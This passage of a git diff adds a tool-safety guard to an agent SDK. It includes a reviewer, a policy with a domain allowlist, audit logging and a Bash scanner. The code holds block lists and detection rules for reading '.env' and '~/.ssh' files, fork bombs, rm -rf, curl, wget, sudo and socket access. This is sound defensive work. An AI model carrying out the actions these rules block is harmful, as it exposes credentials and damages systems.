decision for *text*.""" + started_at = time.perf_counter() + source = text or "" + network_review: SafetyReview | None = None + urls = _extract_urls(source) + if urls: + network_review = self._review_network(source, urls, action_type, tool_name, started_at) + if network_review is not None and network_review.decision != "allow": + return network_review + + path_review = self._review_blocked_paths(source, action_type, tool_name, started_at) + if path_review is not None: + return path_review + + for rule in _RULES: + match = rule.pattern.search(source) + if match: + evidence, desensitized = _redact_evidence(match.group(0)) + return self._build_review( + source=source, + action_type=action_type, + tool_name=tool_name, + decision=rule.decision, + rule_id=rule.rule_id, + finding=rule.finding, + risk_level=self.policy.risk_level_for(rule.rule_id), + recommendation=rule.recommendation, + evidence=evidence, + desensitized=desensitized, + started_at=started_at, + ) + + if network_review is not None: + return network_review + + return self._build_review( + source=source, + action_type=action_type, + tool_name=tool_name, + decision="allow", + rule_id="safe_python", + finding="No risky code or command patterns detected.", + risk_level=self.policy.risk_level_for("safe_python"), + recommendation="Proceed with normal execution.", + evidence="", + desensitized=False, + started_at=started_at, + ) + + def _review_network( + self, + source: str, + urls: list[str], + action_type: str, + tool_name: str, + started_at: float, + ) -> SafetyReview | None: + disallowed_hosts = [ + _normalize_host(urlparse(url).hostname or "") for url in urls + if not _host_allowed(_normalize_host(urlparse(url).hostname or ""), self.policy.allowed_domains) + ] + if disallowed_hosts: + return self._build_review( + source=source, + action_type=action_type, + tool_name=tool_name, + decision="deny", + rule_id="network_not_allowlisted", + finding="Network request targets a non-allowlisted domain.", + risk_level=self.policy.risk_level_for("network_not_allowlisted"), + recommendation="Only request domains that are explicitly allowlisted.", + evidence=disallowed_hosts[0], + desensitized=False, + started_at=started_at, + ) + return self._build_review( + source=source, + action_type=action_type, + tool_name=tool_name, + decision="allow", + rule_id="network_allowlist", + finding="Network request targets an allowlisted domain.", + risk_level=self.policy.risk_level_for("network_allowlist"), + recommendation="Proceed with the allowlisted network request.", + evidence=_normalize_host(urlparse(urls[0]).hostname or ""), + desensitized=False, + started_at=started_at, + ) + + def _review_blocked_paths( + self, + source: str, + action_type: str, + tool_name: str, + started_at: float, + ) -> SafetyReview | None: + for rule_id, (finding, recommendation, decision) in _PATH_RULES.items(): + for blocked_path in self.policy.blocked_paths_for(rule_id): + if blocked_path and blocked_path in source: + return self._build_review( + source=source, + action_type=action_type, + tool_name=tool_name, + decision=decision, + rule_id=rule_id, + finding=finding, + risk_level=self.policy.risk_level_for(rule_id), + recommendation=recommendation, + evidence=blocked_path, + desensitized=False, + started_at=started_at, + ) + return None + + def _build_review( + self, + *, + source: str, + action_type: str, + tool_name: str, + decision: str, + rule_id: str, + finding: str, + risk_level: str, + recommendation: str, + evidence: str, + desensitized: bool, + started_at: float, + ) -> SafetyReview: + source_hash = hashlib.sha256(source.encode("utf-8")).hexdigest() + blocked = decision in {"deny", "needs_human_review"} + latency = time.perf_counter() - started_at + rules_evaluated = ["safe_python", "network_allowlist", "network_not_allowlisted"] + rules_evaluated.extend(_PATH_RULES) + rules_evaluated.extend(rule.rule_id for rule in _RULES) + report = { + "decision": decision, + "rule_id": rule_id, + "finding": finding, + "risk_level": risk_level, + "tool_name": tool_name, + "blocked": blocked, + "latency": latency, + "desensitized": desensitized, + "recommendation": recommendation, + "evidence": evidence, + } + audit = { + "decision": decision, + "rule_id": rule_id, + "risk_level": risk_level, + "tool_name": tool_name, + "blocked": blocked, + "latency": latency, + "desensitized": desensitized, + "action_type": action_type, + "input_sha256": source_hash, + "allowed_domains": list(self.policy.allowed_domains), + "rules_evaluated": rules_evaluated, + } + return SafetyReview( + decision=decision, + rule_id=rule_id, + finding=finding, + report=report, + audit=audit, + ) + + +def _extract_urls(text: str) -> list[str]: + return [match.group(0).rstrip(").,;") for match in _URL_RE.finditer(text)] + + +def _host_allowed(host: str, allowed_domains: tuple[str, ...]) -> bool: + if not host or not allowed_domains: + return False + return any(host == allowed or host.endswith(f".{allowed}") for allowed in allowed_domains) + + +def _normalize_host(host: str) -> str: + host = host.strip().lower() + if "://" in host: + host = urlparse(host).hostname or "" + if host.startswith("www."): + host = host[4:] + return host.rstrip(".") + + +def _redact_evidence(value: str) -> tuple[str, bool]: + redacted = re.sub( + r"(?i)(api[_-]?key|token|secret|password)\s*=\s*['\"]?[^'\"\s)]+", + r"\1=", + value, + ) + return redacted[:120], redacted != value + + +SafetyChecker = SafetyReviewer diff --git a/trpc_agent_sdk/_tool_safety_policy.py b/trpc_agent_sdk/_tool_safety_policy.py new file mode 100644 index 00000000..5e3759ce --- /dev/null +++ b/trpc_agent_sdk/_tool_safety_policy.py @@ -0,0 +1,196 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Policy configuration for tool safety review.""" + +from __future__ import annotations + +from dataclasses import dataclass +from dataclasses import replace +from pathlib import Path +from typing import Iterable +from typing import Mapping + +import yaml + + +class SafetyPolicyError(ValueError): + """Raised when a tool safety policy file is invalid.""" + + +_DEFAULT_ALLOWED_DOMAINS: tuple[str, ...] = () +_DEFAULT_BLOCKED_PATHS: dict[str, tuple[str, ...]] = { + "read_dotenv": (".env", ), + "read_ssh": ("~/.ssh", ".ssh/"), +} +_DEFAULT_ALLOWED_COMMANDS: tuple[str, ...] = () +_DEFAULT_MAX_TIMEOUT = 60 +_DEFAULT_MAX_OUTPUT_SIZE = 10_000 +_DEFAULT_RISK_LEVELS: dict[str, str] = { + "safe_python": "none", + "dangerous_delete": "critical", + "read_dotenv": "high", + "read_ssh": "critical", + "subprocess_execution": "high", + "os_system_execution": "high", + "package_install": "medium", + "npm_install": "medium", + "apt_install": "medium", + "infinite_loop": "high", + "sensitive_output": "high", + "wget_network": "high", + "aiohttp_network": "high", + "socket_network": "high", + "fork_bomb": "critical", + "bash_pipe": "medium", + "shell_injection": "medium", + "excessive_concurrency": "high", + "large_file_write": "high", + "human_review_required": "medium", + "network_allowlist": "none", + "network_not_allowlisted": "high", +} + + +@dataclass(frozen=True) +class ToolSafetyPolicy: + """Configuration used by the tool safety reviewer.""" + + allowed_domains: tuple[str, ...] = _DEFAULT_ALLOWED_DOMAINS + blocked_paths: Mapping[str, tuple[str, ...]] | None = None + allowed_commands: tuple[str, ...] = _DEFAULT_ALLOWED_COMMANDS + max_timeout: int = _DEFAULT_MAX_TIMEOUT + max_output_size: int = _DEFAULT_MAX_OUTPUT_SIZE + risk_levels: Mapping[str, str] | None = None + + def __post_init__(self) -> None: + object.__setattr__(self, "allowed_domains", + tuple(sorted(_coerce_string_tuple( + self.allowed_domains, + "allowed_domains", + )))) + blocked_paths = self.blocked_paths if self.blocked_paths is not None else _DEFAULT_BLOCKED_PATHS + object.__setattr__(self, "blocked_paths", _coerce_blocked_paths(blocked_paths)) + object.__setattr__(self, "allowed_commands", + tuple(sorted(_coerce_string_tuple( + self.allowed_commands, + "allowed_commands", + )))) + object.__setattr__(self, "max_timeout", _coerce_positive_int(self.max_timeout, "max_timeout")) + object.__setattr__(self, "max_output_size", _coerce_positive_int( + self.max_output_size, + "max_output_size", + )) + risk_levels = dict(_DEFAULT_RISK_LEVELS) + if self.risk_levels is not None: + risk_levels.update(_coerce_string_mapping(self.risk_levels, "risk_levels")) + object.__setattr__(self, "risk_levels", risk_levels) + + @classmethod + def default(cls) -> "ToolSafetyPolicy": + """Return the default safety policy.""" + return cls() + + def with_allowed_domains(self, domains: Iterable[str]) -> "ToolSafetyPolicy": + """Return a copy with a different domain allowlist.""" + return replace(self, allowed_domains=tuple(domains)) + + def risk_level_for(self, rule_id: str) -> str: + """Return configured risk level for *rule_id*.""" + return self.risk_levels.get(rule_id, "medium") # type: ignore[union-attr] + + def blocked_paths_for(self, rule_id: str) -> tuple[str, ...]: + """Return configured blocked path fragments for *rule_id*.""" + return self.blocked_paths.get(rule_id, ()) # type: ignore[union-attr] + + +def load_tool_safety_policy(path: str | Path | None = None) -> ToolSafetyPolicy: + """Load a tool safety policy from YAML, or return defaults.""" + if path is None: + return ToolSafetyPolicy.default() + + policy_path = Path(path) + if not policy_path.exists(): + return ToolSafetyPolicy.default() + + try: + raw = yaml.safe_load(policy_path.read_text(encoding="utf-8")) + except yaml.YAMLError as exc: + raise SafetyPolicyError(f"Invalid tool safety policy YAML: {exc}") from exc + except OSError as exc: + raise SafetyPolicyError(f"Unable to read tool safety policy {policy_path}: {exc}") from exc + + if raw is None: + return ToolSafetyPolicy.default() + if not isinstance(raw, dict): + raise SafetyPolicyError("Invalid tool safety policy: top-level YAML value must be a mapping") + + allowed_keys = { + "allowed_domains", + "blocked_paths", + "allowed_commands", + "max_timeout", + "max_output_size", + "risk_levels", + } + unknown = sorted(set(raw) - allowed_keys) + if unknown: + raise SafetyPolicyError(f"Invalid tool safety policy: unknown field(s): {', '.join(unknown)}") + + defaults = ToolSafetyPolicy.default() + return ToolSafetyPolicy( + allowed_domains=raw.get("allowed_domains", defaults.allowed_domains), + blocked_paths=raw.get("blocked_paths", defaults.blocked_paths), + allowed_commands=raw.get("allowed_commands", defaults.allowed_commands), + max_timeout=raw.get("max_timeout", defaults.max_timeout), + max_output_size=raw.get("max_output_size", defaults.max_output_size), + risk_levels=raw.get("risk_levels", defaults.risk_levels), + ) + + +def _coerce_string_tuple(value: object, field_name: str) -> tuple[str, ...]: + if value is None: + return () + if not isinstance(value, (list, tuple, set)): + raise SafetyPolicyError(f"Invalid tool safety policy: {field_name} must be a list of strings") + result = [] + for item in value: + if not isinstance(item, str): + raise SafetyPolicyError(f"Invalid tool safety policy: {field_name} must contain only strings") + cleaned = item.strip() + if cleaned: + result.append(cleaned) + return tuple(result) + + +def _coerce_blocked_paths(value: object) -> dict[str, tuple[str, ...]]: + if isinstance(value, (list, tuple, set)): + return {"read_dotenv": _coerce_string_tuple(value, "blocked_paths")} + if not isinstance(value, Mapping): + raise SafetyPolicyError("Invalid tool safety policy: blocked_paths must be a mapping or list of strings") + + result: dict[str, tuple[str, ...]] = {} + for rule_id, paths in value.items(): + if not isinstance(rule_id, str): + raise SafetyPolicyError("Invalid tool safety policy: blocked_paths keys must be strings") + result[rule_id] = _coerce_string_tuple(paths, f"blocked_paths.{rule_id}") + return result + + +def _coerce_string_mapping(value: object, field_name: str) -> dict[str, str]: + if not isinstance(value, Mapping): + raise SafetyPolicyError(f"Invalid tool safety policy: {field_name} must be a mapping") + result: dict[str, str] = {} + for key, item in value.items(): + if not isinstance(key, str) or not isinstance(item, str): + raise SafetyPolicyError(f"Invalid tool safety policy: {field_name} keys and values must be strings") + result[key] = item + return result + + +def _coerce_positive_int(value: object, field_name: str) -> int: + if not isinstance(value, int) or isinstance(value, bool) or value <= 0: + raise SafetyPolicyError(f"Invalid tool safety policy: {field_name} must be a positive integer") + return value diff --git a/trpc_agent_sdk/_tool_safety_telemetry.py b/trpc_agent_sdk/_tool_safety_telemetry.py new file mode 100644 index 00000000..d936680f --- /dev/null +++ b/trpc_agent_sdk/_tool_safety_telemetry.py @@ -0,0 +1,40 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Telemetry helpers for tool safety review results.""" + +from __future__ import annotations + +from typing import Any + +from trpc_agent_sdk._tool_safety import SafetyReview + +try: + from opentelemetry import trace +except Exception: # pylint: disable=broad-except + trace = None # type: ignore[assignment] + + +def trace_tool_safety_review(review: SafetyReview) -> None: + """Write tool safety review attributes to the current span. + + This helper is intentionally best-effort: safety decisions must not depend + on telemetry availability or exporter configuration. + """ + try: + if trace is None: + return + span = trace.get_current_span() + span.set_attribute("tool.safety.decision", _attribute_value(review.decision)) + span.set_attribute("tool.safety.risk_level", _attribute_value(review.report.get("risk_level", ""))) + span.set_attribute("tool.safety.rule_id", _attribute_value(review.rule_id)) + except Exception: # pylint: disable=broad-except + return + + +def _attribute_value(value: Any) -> str: + if isinstance(value, (list, tuple, set, frozenset)): + return ",".join(str(item) for item in value) + return str(value) diff --git a/trpc_agent_sdk/server/openclaw/__init__.py b/trpc_agent_sdk/server/openclaw/__init__.py index bc6e483f..59e5aaab 100644 --- a/trpc_agent_sdk/server/openclaw/__init__.py +++ b/trpc_agent_sdk/server/openclaw/__init__.py @@ -3,3 +3,13 @@ # Copyright (C) 2026 Tencent. All rights reserved. # # tRPC-Agent-Python is licensed under Apache-2.0. + +from ._safety_review import SafetyChecker +from ._safety_review import SafetyReview +from ._safety_review import SafetyReviewer + +__all__ = [ + "SafetyChecker", + "SafetyReview", + "SafetyReviewer", +] diff --git a/trpc_agent_sdk/server/openclaw/_safety_review.py b/trpc_agent_sdk/server/openclaw/_safety_review.py new file mode 100644 index 00000000..5897563f --- /dev/null +++ b/trpc_agent_sdk/server/openclaw/_safety_review.py @@ -0,0 +1,18 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Compatibility exports for OpenClaw safety review.""" + +from trpc_agent_sdk._tool_safety import SafetyChecker +from trpc_agent_sdk._tool_safety import SafetyReview +from trpc_agent_sdk._tool_safety import SafetyReviewer +from trpc_agent_sdk._tool_safety import Rule + +__all__ = [ + "Rule", + "SafetyChecker", + "SafetyReview", + "SafetyReviewer", +] diff --git a/trpc_agent_sdk/tools/__init__.py b/trpc_agent_sdk/tools/__init__.py index 3efb355b..a5762d56 100644 --- a/trpc_agent_sdk/tools/__init__.py +++ b/trpc_agent_sdk/tools/__init__.py @@ -81,6 +81,14 @@ from .mcp_tool import StdioConnectionParams from .mcp_tool import StreamableHTTPConnectionParams from .mcp_tool import patch_mcp_cancel_scope_exit_issue +from .safety import SafetyChecker +from .safety import Rule +from .safety import SafetyPolicyError +from .safety import SafetyReview +from .safety import SafetyReviewer +from .safety import ToolSafetyFilter +from .safety import ToolSafetyPolicy +from .safety import load_tool_safety_policy from .utils import build_function_declaration from .utils import from_function_with_options from .utils import get_required_fields @@ -163,6 +171,14 @@ "StdioConnectionParams", "StreamableHTTPConnectionParams", "patch_mcp_cancel_scope_exit_issue", + "Rule", + "SafetyChecker", + "SafetyPolicyError", + "SafetyReview", + "SafetyReviewer", + "ToolSafetyFilter", + "ToolSafetyPolicy", + "load_tool_safety_policy", "build_function_declaration", "from_function_with_options", "get_required_fields", diff --git a/trpc_agent_sdk/tools/safety/__init__.py b/trpc_agent_sdk/tools/safety/__init__.py new file mode 100644 index 00000000..11675b8f --- /dev/null +++ b/trpc_agent_sdk/tools/safety/__init__.py @@ -0,0 +1,116 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Tool script safety guard framework.""" + +from .audit import DEFAULT_AUDIT_LOG_FILE +from .audit import SafetyAuditLogger +from .audit import build_audit_record +from .audit import risk_level +from .bash_scanner import AptInstallRule +from .bash_scanner import BackgroundExecutionRule +from .bash_scanner import BashScanner +from .bash_scanner import CurlRule +from .bash_scanner import ForkBombRule +from .bash_scanner import LongSleepRule +from .bash_scanner import NpmInstallRule +from .bash_scanner import PipInstallRule +from .bash_scanner import RmRfRule +from .bash_scanner import ShellPipeRule +from .bash_scanner import SudoRule +from .bash_scanner import WgetRule +from .bash_scanner import create_bash_rules +from .checker import Rule as ScannerRule +from .checker import SafetyChecker as ScriptSafetyChecker +from .decision import DecisionEngine +from .models import Finding +from .models import SafetyDecision +from .models import SafetyResult +from .models import SafetySeverity +from .models import ToolExecutionRequest +from .policy import DEFAULT_POLICY_FILE +from .policy import PolicyLoader +from .policy import SAFETY_POLICY_ENV +from .policy import SafetyPolicy +from .python_scanner import EnvFileReadRule +from .python_scanner import OsSystemRule +from .python_scanner import PythonScanner +from .python_scanner import RequestsGetPostRule +from .python_scanner import ShutilRmtreeRule +from .python_scanner import SocketConnectRule +from .python_scanner import SshPathReadRule +from .python_scanner import SubprocessPopenRule +from .python_scanner import SubprocessRunRule +from .python_scanner import create_python_rules +from .report import DEFAULT_REPORT_FILE +from .report import SafetyReportWriter +from .report import build_report +from .telemetry import record_safety_attributes +from .wrapper import SafetyExecutionWrapper +from .wrapper import SafetyViolationError +from ._filter import ToolSafetyFilter +from trpc_agent_sdk._tool_safety import Rule +from trpc_agent_sdk._tool_safety import SafetyChecker +from trpc_agent_sdk._tool_safety import SafetyReview +from trpc_agent_sdk._tool_safety import SafetyReviewer +from trpc_agent_sdk._tool_safety_policy import SafetyPolicyError +from trpc_agent_sdk._tool_safety_policy import ToolSafetyPolicy +from trpc_agent_sdk._tool_safety_policy import load_tool_safety_policy + +__all__ = [ + "DEFAULT_AUDIT_LOG_FILE", + "SafetyAuditLogger", + "build_audit_record", + "risk_level", + "AptInstallRule", + "BackgroundExecutionRule", + "BashScanner", + "CurlRule", + "ForkBombRule", + "LongSleepRule", + "NpmInstallRule", + "PipInstallRule", + "RmRfRule", + "ShellPipeRule", + "SudoRule", + "WgetRule", + "create_bash_rules", + "Rule", + "ScannerRule", + "SafetyChecker", + "ScriptSafetyChecker", + "SafetyReview", + "SafetyReviewer", + "DecisionEngine", + "ToolSafetyFilter", + "SafetyPolicyError", + "ToolSafetyPolicy", + "load_tool_safety_policy", + "Finding", + "SafetyDecision", + "SafetyResult", + "SafetySeverity", + "ToolExecutionRequest", + "DEFAULT_POLICY_FILE", + "PolicyLoader", + "SAFETY_POLICY_ENV", + "SafetyPolicy", + "EnvFileReadRule", + "OsSystemRule", + "PythonScanner", + "RequestsGetPostRule", + "ShutilRmtreeRule", + "SocketConnectRule", + "SshPathReadRule", + "SubprocessPopenRule", + "SubprocessRunRule", + "create_python_rules", + "DEFAULT_REPORT_FILE", + "SafetyReportWriter", + "build_report", + "record_safety_attributes", + "SafetyExecutionWrapper", + "SafetyViolationError", +] diff --git a/trpc_agent_sdk/tools/safety/_filter.py b/trpc_agent_sdk/tools/safety/_filter.py new file mode 100644 index 00000000..6151bed3 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/_filter.py @@ -0,0 +1,117 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Tool filter integration for reusable safety review.""" + +from __future__ import annotations + +import json +from pathlib import Path +from typing import Any +from typing import Iterable +from typing import Mapping +from typing import Sequence +from typing_extensions import override + +from trpc_agent_sdk._tool_safety import SafetyReview +from trpc_agent_sdk._tool_safety import SafetyReviewer +from trpc_agent_sdk._tool_safety_policy import ToolSafetyPolicy +from trpc_agent_sdk._tool_safety_telemetry import trace_tool_safety_review +from trpc_agent_sdk.context import AgentContext +from trpc_agent_sdk.filter import BaseFilter +from trpc_agent_sdk.filter import FilterResult +from trpc_agent_sdk.filter import FilterType +from trpc_agent_sdk.filter import register_tool_filter +from trpc_agent_sdk.tools._context_var import get_tool_var + +_DEFAULT_BLOCK_DECISIONS = ("deny", "needs_human_review") + + +@register_tool_filter("tool_safety") +class ToolSafetyFilter(BaseFilter): + """Block unsafe tool invocations before the tool implementation runs. + + The filter reviews the serialized tool arguments with :class:`SafetyReviewer`. + Reviews whose decision is in ``block_decisions`` return a structured tool error + response and stop the filter chain without raising an exception. + """ + + def __init__( + self, + *, + reviewer: SafetyReviewer | None = None, + allowed_domains: Iterable[str] | None = None, + policy: ToolSafetyPolicy | None = None, + policy_path: str | None = None, + block_decisions: Sequence[str] = _DEFAULT_BLOCK_DECISIONS, + action_type: str | None = None, + ) -> None: + super().__init__() + self._type = FilterType.TOOL + self._name = "tool_safety" + if reviewer is not None and (allowed_domains is not None or policy is not None or policy_path is not None): + raise ValueError("reviewer cannot be combined with allowed_domains, policy, or policy_path") + self._reviewer = reviewer or SafetyReviewer( + allowed_domains=allowed_domains, + policy=policy, + policy_path=policy_path, + ) + self._block_decisions = frozenset(block_decisions) + self._action_type = action_type + + @override + async def _before(self, ctx: AgentContext, req: Any, rsp: FilterResult) -> None: + """Review the tool invocation before executing the tool.""" + del ctx + tool = get_tool_var() + tool_name = getattr(tool, "name", "") if tool is not None else "" + action_type = self._action_type or _infer_action_type(tool_name, req) + review = self._reviewer.review( + _serialize_tool_request(req), + action_type=action_type, + tool_name=tool_name, + ) + trace_tool_safety_review(review) + if review.decision not in self._block_decisions: + return + + rsp.rsp = _blocked_tool_response(review) + rsp.error = None + rsp.is_continue = False + + +def _infer_action_type(tool_name: str, req: Any) -> str: + normalized_name = tool_name.lower() + if normalized_name in {"bash", "shell"}: + return "bash" + if isinstance(req, Mapping) and isinstance(req.get("command"), str): + return "bash" + return "tool" + + +def _serialize_tool_request(req: Any) -> str: + if isinstance(req, str): + return req + try: + return json.dumps(req, ensure_ascii=False, sort_keys=True, default=_json_default) + except (TypeError, ValueError): + return str(req) + + +def _json_default(value: Any) -> Any: + if hasattr(value, "model_dump"): + return value.model_dump(mode="json") + if isinstance(value, Path): + return str(value) + return str(value) + + +def _blocked_tool_response(review: SafetyReview) -> dict[str, Any]: + return { + "success": False, + "error": f"TOOL_SAFETY_BLOCKED: {review.finding}", + "safety": review.report, + "safety_audit": review.audit, + } diff --git a/trpc_agent_sdk/tools/safety/_reviewer.py b/trpc_agent_sdk/tools/safety/_reviewer.py new file mode 100644 index 00000000..3207d373 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/_reviewer.py @@ -0,0 +1,18 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Compatibility exports for the reusable safety reviewer.""" + +from trpc_agent_sdk._tool_safety import SafetyChecker +from trpc_agent_sdk._tool_safety import SafetyReview +from trpc_agent_sdk._tool_safety import SafetyReviewer +from trpc_agent_sdk._tool_safety import Rule + +__all__ = [ + "Rule", + "SafetyChecker", + "SafetyReview", + "SafetyReviewer", +] diff --git a/trpc_agent_sdk/tools/safety/audit.py b/trpc_agent_sdk/tools/safety/audit.py new file mode 100644 index 00000000..b9b0d3c7 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/audit.py @@ -0,0 +1,163 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""JSONL audit logging for tool safety checks.""" + +from __future__ import annotations + +import json +import time +from datetime import datetime +from datetime import timezone +from pathlib import Path +from typing import Any +from typing import Optional + +from .models import Finding +from .models import SafetyDecision +from .models import SafetyResult +from .models import SafetySeverity +from .models import ToolExecutionRequest + +DEFAULT_AUDIT_LOG_FILE = Path("tool_safety_audit.jsonl") +_SENSITIVE_KEYS = {"api_key", "authorization", "cookie", "password", "secret", "token"} +_SCRIPT_KEYS = {"bash_code", "cmd", "code", "command", "python_code", "script"} +_SEVERITY_RANK = { + SafetySeverity.INFO: 0, + SafetySeverity.LOW: 1, + SafetySeverity.MEDIUM: 2, + SafetySeverity.HIGH: 3, + SafetySeverity.CRITICAL: 4, +} + + +class SafetyAuditLogger: + """Append tool safety audit events as JSON Lines.""" + + def __init__(self, path: str | Path = DEFAULT_AUDIT_LOG_FILE): + self._path = Path(path) + + @property + def path(self) -> Path: + """Return the audit log path.""" + return self._path + + def write(self, result: SafetyResult, latency_ms: float) -> None: + """Write one audit record.""" + record = build_audit_record(result, latency_ms) + with self._path.open("a", encoding="utf-8") as fp: + fp.write(json.dumps(record, ensure_ascii=False, sort_keys=True)) + fp.write("\n") + + +def build_audit_record(result: SafetyResult, latency_ms: float) -> dict[str, Any]: + """Build one ELK/Grafana-friendly audit record.""" + request = result.request or ToolExecutionRequest() + current_risk_level = risk_level(result.findings) + rule_ids = [finding.rule_id for finding in result.findings] + return { + "timestamp": _utc_now(), + "tool_name": request.tool_name, + "decision": result.decision.value, + "risk_level": current_risk_level.value, + "rule_id": ",".join(rule_ids), + "rule_ids": rule_ids, + "latency": round(latency_ms, 3), + "latency_ms": round(latency_ms, 3), + "blocked": result.decision != SafetyDecision.ALLOW, + "desensitized": True, + "agent_name": request.agent_name, + "invocation_id": request.invocation_id, + "function_call_id": request.function_call_id, + "language": request.language, + "finding_count": len(result.findings), + "findings": [_finding_record(finding) for finding in result.findings], + "request": _request_record(request), + } + + +def risk_level(findings: list[Finding]) -> SafetySeverity: + """Return the highest severity represented by a list of findings.""" + if not findings: + return SafetySeverity.LOW + return max((finding.severity for finding in findings), key=lambda severity: _SEVERITY_RANK[severity]) + + +def _finding_record(finding: Finding) -> dict[str, Any]: + return { + "rule_id": finding.rule_id, + "severity": finding.severity.value, + "target": _desensitize_value(finding.target), + "message": finding.message, + "metadata": _desensitize_value(finding.metadata), + } + + +def _request_record(request: ToolExecutionRequest) -> dict[str, Any]: + return { + "args": _desensitize_args(request.args), + "metadata": _desensitize_value(request.metadata), + "script_present": bool(request.script), + "script_length": len(request.script or ""), + } + + +def _desensitize_args(args: dict[str, Any]) -> dict[str, Any]: + return {str(key): _desensitize_arg_value(str(key), value) for key, value in args.items()} + + +def _desensitize_arg_value(key: str, value: Any) -> Any: + lowered_key = key.lower() + if lowered_key in _SCRIPT_KEYS: + return _desensitize_script_value(value) + if _is_sensitive_key(lowered_key): + return "***" + return _desensitize_value(value) + + +def _desensitize_script_value(value: Any) -> dict[str, Any]: + text = value if isinstance(value, str) else "" + return { + "redacted": True, + "length": len(text), + } + + +def _desensitize_value(value: Any) -> Any: + if isinstance(value, dict): + return { + str(key): "***" if _is_sensitive_key(str(key)) else _desensitize_value(item) + for key, item in value.items() + } + if isinstance(value, list): + return [_desensitize_value(item) for item in value] + if isinstance(value, tuple): + return [_desensitize_value(item) for item in value] + if isinstance(value, str): + return _desensitize_string(value) + return value + + +def _is_sensitive_key(key: str) -> bool: + lowered = key.lower() + return any(sensitive_key in lowered for sensitive_key in _SENSITIVE_KEYS) + + +def _desensitize_string(value: str) -> str: + if len(value) <= 256: + return value + return f"{value[:128]}..." + + +def _utc_now() -> str: + return datetime.now(timezone.utc).isoformat() + + +def monotonic_ms(start: Optional[float] = None) -> float: + """Return monotonic milliseconds since start, or current monotonic milliseconds.""" + now = time.monotonic() * 1000 + if start is None: + return now + return now - start diff --git a/trpc_agent_sdk/tools/safety/bash_scanner.py b/trpc_agent_sdk/tools/safety/bash_scanner.py new file mode 100644 index 00000000..e1d93feb --- /dev/null +++ b/trpc_agent_sdk/tools/safety/bash_scanner.py @@ -0,0 +1,422 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Pattern-based Bash safety scanner rules.""" + +from __future__ import annotations + +import re +import shlex +from math import inf +from typing import List +from typing import Optional + +from .checker import Rule +from .checker import SafetyChecker +from .models import Finding +from .models import SafetyResult +from .models import SafetySeverity +from .models import ToolExecutionRequest +from .policy import SafetyPolicy + +_BASH_LANGUAGES = {"bash", "sh", "shell", "zsh"} +_LONG_SLEEP_SECONDS = 3600 + + +class BashLine: + """One source line plus shell tokens.""" + + def __init__(self, number: int, text: str): + self.number = number + self.text = text + self.tokens = _split_shell_tokens(text) + + +class BashScanContext: + """Tokenized Bash source.""" + + def __init__(self, source: str): + self.source = source + self.lines = [BashLine(number, text) for number, text in enumerate(source.splitlines(), start=1)] + + +class BashRule(Rule): + """Base class for pattern-backed Bash rules.""" + + severity = SafetySeverity.HIGH + + async def check(self, request: ToolExecutionRequest, policy: SafetyPolicy) -> List[Finding]: + source = _extract_bash_source(request) + if not source: + return [] + return self.check_script(BashScanContext(source), policy) + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + """Check Bash source and return findings.""" + raise NotImplementedError + + def _finding(self, message: str, line: BashLine, policy: SafetyPolicy, target: str = "") -> Finding: + column = line.text.find(target) if target else -1 + return Finding( + rule_id=self.rule_id, + message=message, + severity=policy.rule_severity(self.rule_id, self.severity), + target=target, + metadata={ + "line": line.number, + "column": max(column, 0), + }, + ) + + +class RmRfRule(BashRule): + """Detect rm -rf style deletion.""" + + @property + def rule_id(self) -> str: + return "bash.rm_rf" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for line in context.lines: + for index, token in enumerate(line.tokens): + command = _command_name(token) + if command != "rm" or policy.is_command_allowed(self.rule_id, command): + continue + flags = _collect_short_flags(line.tokens[index + 1:]) + if "r" in flags and "f" in flags: + findings.append(self._finding("Bash code calls rm -rf.", line, policy, "rm")) + break + return findings + + +class CurlRule(BashRule): + """Detect curl calls.""" + + @property + def rule_id(self) -> str: + return "bash.curl" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + return _command_findings(self, context, policy, {"curl"}, "Bash code calls curl.") + + +class WgetRule(BashRule): + """Detect wget calls.""" + + @property + def rule_id(self) -> str: + return "bash.wget" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + return _command_findings(self, context, policy, {"wget"}, "Bash code calls wget.") + + +class SudoRule(BashRule): + """Detect sudo calls.""" + + @property + def rule_id(self) -> str: + return "bash.sudo" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + return _command_findings(self, context, policy, {"sudo"}, "Bash code calls sudo.") + + +class AptInstallRule(BashRule): + """Detect apt install calls.""" + + @property + def rule_id(self) -> str: + return "bash.apt_install" + + def check_script(self, context: BashScanContext, policy: SafetyPolicy) -> List[Finding]: + findings: list[Finding] = [] + for line in context.lines: + command = _install_command(line.tokens, {"apt", "apt-get"}) + if command and not policy.is_command_allowed(self.rule_id, command): + findings.append(self._finding("Bash code calls apt install.", line, policy, command)) + return 